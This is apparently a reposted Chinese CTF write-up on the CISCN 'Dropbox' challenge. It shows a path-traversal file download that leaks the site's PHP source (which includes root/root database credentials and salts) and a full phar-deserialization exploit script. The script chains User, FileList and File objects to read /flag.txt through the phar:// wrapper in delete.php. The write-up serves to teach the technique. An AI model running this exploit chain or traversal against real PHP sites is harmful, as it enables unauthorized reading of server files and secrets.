由一道题学习phar反序列化

CISCN Dropbox

题目首先要注册一个用户,然后登陆。

 

 上传文件这里做了限制,只能上传图片格式文件。

 上传文件后抓数据包,可以看到filename参数,这里可以获取代码。

由一道题学习phar反序列化_第1张图片

 

 filename=../../index.php

可以获取index代码,之后利用代码中的文件包含可以拿到所有源码

class.php

php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) { 
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

login.php

php
include "class.php";

if (isset($_GET['register'])) {
    echo "";
}

if (isset($_POST["username"]) && isset($_POST["password"])) {
    $u = new User();
    $username = (string) $_POST["username"];
    $password = (string) $_POST["password"];
    if (strlen($username) < 20 && $u->verify_user($username, $password)) {
        $_SESSION['login'] = true;
        $_SESSION['username'] = htmlentities($username);
        $sandbox = "uploads/" . sha1($_SESSION['username'] . "sftUahRiTz") . "/";
        if (!is_dir($sandbox)) {
            mkdir($sandbox);
        }
        $_SESSION['sandbox'] = $sandbox;
        echo("");
        die();
    }
    echo "";
}
?>

index.php

php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
?>


    
    

    
    
    网盘管理

    
        
        
        
        
        
        
    



class="hidden">
class="top" id="toast-container">
php include "class.php"; $a = new FileList($_SESSION['sandbox']); $a->Name(); $a->Size(); ?>

download.php

php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>

delete.php

php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

这几个文件都有不同的功能,先分析一下download.php

  • open_basedir

在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。它是可以访问设置目录下的所有下级目录。
若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。”."可代表当前目录,open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。例:
ini_set(“open_basedir”, getcwd() . “:/etc:/tmp”); 就是只可以访问当前目录(getcwd()返回当前目录)、/etc和/tmp三个目录。解释了为什么要在delete.php中利用payload,而不是download.php。

  • chdir() mkdir()

  • chdir() 现实目录跳跃,解释了为什么下载时要filename = ../../indx.php ,而不是filename = index.php。
  • mkdir() 创建一个文件夹

phar储存:

phar是一种用来储存序列化对象的文件格式,这里运用的phar特性为,phar文件即使修改后缀名后不影响执行文件效果。

XXX.phar改为xxx.jpg 也可以执行,这里与phar文件的特性有关。

phar文件都有相同的头文件和结束标志,在执行phar时是头文件在发挥主要作用,与后缀名是否为.phar无关。

观察class.php

php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '
'; $table .= ''; foreach ($this->funcs as$func) { $table .= ''; } $table .= ''; $table .= ''; foreach ($this->results as$filename => $result) { $table .= ''; foreach ($resultas$func => $value) { $table .= ''; } $table .= ''; $table .= ''; } echo$table; } } classFile { public$filename; publicfunction open($filename) { $this->filename = $filename; if (file_exists($filename) && !is_dir($filename)) { returntrue; } else { returnfalse; } } publicfunction name() { returnbasename($this->filename); } publicfunction size() { $size = filesize($this->filename); $units = array(' B', ' KB', ' MB', ' GB', ' TB'); for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024; returnround($size, 2).$units[$i]; } publicfunction detele() { unlink($this->filename); } publicfunction close() { returnfile_get_contents($this->filename); } } ?>

close函数中可以读取文件,因此可以利用close类去读取flag

payload:

php
class User {
    public $db;
    public function __construct(){
        $this->db=new FileList;
    }
}

class File{
    public $filename;
}

class FileList{
    private $files;
    private $results;
    private $funcs;
    public function __construct(){
        $file=new File;
        $file->filename='/flag.txt';
        $this->files = array($file);
        $this->results = array();
        $this->funcs = array();

    }

}

ini_set('phar.readonly',0);
@unlink("phar.phar");
$phar = new Phar("mortals.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub(""); //设置stub
$mortals = new User();
$phar->setMetadata($mortals); //将自定义的meta-data存入manifest
$phar->addFromString("shell.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

上传文件时要修改后缀名

由一道题学习phar反序列化_第2张图片

 

 

删除文件。

修改phar伪协议读取flag

由一道题学习phar反序列化_第3张图片

 

 flag{f29e0bac-8095-4123-b272-87991a532a69}

 

 

你可能感兴趣的:(由一道题学习phar反序列化)

' . htmlentities($func) . 'Opt
' . htmlentities($value) . 'htmlentities($filename) . '">下载 / 删除